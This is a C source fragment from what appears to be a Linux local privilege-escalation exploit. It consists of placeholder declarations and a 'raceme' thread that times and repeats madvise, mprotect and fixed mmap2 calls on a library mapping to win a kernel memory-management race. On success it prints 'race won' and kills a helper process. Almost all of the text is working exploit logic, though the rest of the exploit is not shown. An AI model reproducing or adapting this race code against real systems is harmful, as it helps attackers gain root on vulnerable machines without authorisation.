
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ ENOMEM ;
 int LIB_SIZE ;
 int MADV_NORMAL ;
 int MAP_ANONYMOUS ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 int PAGE_SIZE ;
 int PROT_NONE ;
 int SIGKILL ;
 int _exit (int ) ;
 int consume_pid ;
 unsigned int delta ;
 scalar_t__ delta_max ;
 scalar_t__ errno ;
 int fatal (char*,int ) ;
 int fflush (int ) ;
 int finish ;
 int go ;
 int kill (int ,int ) ;
 scalar_t__ lib_addr ;
 int map_addr ;
 int map_count ;
 int map_flags ;
 int printf (char*,int) ;
 scalar_t__ smp ;
 scalar_t__ smp_max ;
 int stdout ;
 int sys_gettimeofday (int *,int *) ;
 int sys_madvise (void*,int,int ) ;
 int sys_mmap2 (scalar_t__,int,int ,int,int ,int ) ;
 int sys_mprotect (int ,int,int ) ;
 int sys_sched_yield () ;
 int tm1 ;
 int tm2 ;
 unsigned int tmdiff (int *,int *) ;
 int val ;

int raceme(void* v)
{
 finish=1;

 for(;;) {
  errno = 0;


recheck:
  if(!go) sys_sched_yield();
  sys_gettimeofday(&tm2, ((void*)0));
  delta = tmdiff(&tm1, &tm2);
  if(!smp_max && delta < (unsigned)delta_max) goto recheck;
  smp = smp_max;


recheck2:
  val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);
  if(val) continue;
  errno = 0;
  val = sys_madvise((void*) (lib_addr+PAGE_SIZE),
    LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
  if( !val || (val<0 && errno!=ENOMEM) ) continue;


  smp--;
  if(smp>=0) goto recheck2;


  if(!go) continue;
  finish++;


  val = sys_mprotect(map_addr, PAGE_SIZE, map_flags);
  if(val) fatal("mprotect", 0);
  val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE,
         MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
  if(-1==val) fatal("mmap2 race", 0);
  printf("\n[+] race won maps=%d", map_count); fflush(stdout);
  kill(consume_pid, SIGKILL);
  _exit(0);
 }

return 0;
}
